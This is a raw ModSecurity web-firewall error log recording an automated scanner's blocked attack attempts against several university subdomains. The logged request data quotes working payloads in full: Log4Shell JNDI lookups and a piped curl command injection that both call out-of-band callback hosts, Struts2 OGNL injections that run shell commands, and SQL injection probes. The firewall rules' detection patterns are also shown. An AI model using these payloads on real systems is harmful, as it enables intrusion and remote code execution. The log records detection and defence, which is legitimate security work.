[Tue Aug 29 11:33:53.320262 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg641prf5tyho9p.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAARjjTMAAAAL"]
[Tue Aug 29 11:33:53.339630 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlggaatjw5ou7tgz.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAARtADgAAAAV"]
[Tue Aug 29 11:33:53.340070 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg7ds5qk45myh1i.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAANsAmsAAAAD"]
[Tue Aug 29 11:33:53.340896 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAASFeeoAAAAG"]
[Tue Aug 29 11:33:53.342676 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlghduyn8dpqt6eu.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAAR@KJ8AAAAF"]
[Tue Aug 29 11:33:53.352259 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAASEJRoAAAAE"]
[Tue Aug 29 11:33:53.360458 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11McCo-f0AAARtADkAAAAV"]
[Tue Aug 29 11:33:53.366459 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAAQKOqUAAAAs"]
[Tue Aug 29 11:33:53.380631 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAARtADoAAAAV"]
[Tue Aug 29 11:33:53.384181 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAARy-1UAAAAb"]
[Tue Aug 29 11:33:53.417592 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgfqxmrbeje5dtx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAARy-1YAAAAb"]
[Tue Aug 29 11:33:54.307196 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAANsAm8AAAAD"]
[Tue Aug 29 11:33:54.311096 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAARdiNsAAAAK"]
[Tue Aug 29 11:33:54.323601 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAARy-1cAAAAb"]
[Tue Aug 29 11:33:54.353653 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgzu5ag6jmgkjjo.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11MsCo-f0AAANsAnEAAAAD"]
[Tue Aug 29 11:33:54.355912 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAARy-1gAAAAb"]
[Tue Aug 29 11:33:54.362762 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgj671jk3tenebu.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11MsCo-f0AAARQ4EgAAAAB"]
[Tue Aug 29 11:33:54.374483 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAANsAnIAAAAD"]
[Tue Aug 29 11:33:54.394607 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAANsAnMAAAAD"]
[Tue Aug 29 11:33:54.403348 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAAQKOqwAAAAs"]
[Tue Aug 29 11:33:54.405274 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAAPDoK8AAAAP"]
[Tue Aug 29 11:33:54.422044 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAASAHfEAAAAH"]
[Tue Aug 29 11:33:54.425945 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAARdiN8AAAAK"]
[Tue Aug 29 11:33:55.325651 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "informatika.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAAPDoLEAAAAP"]
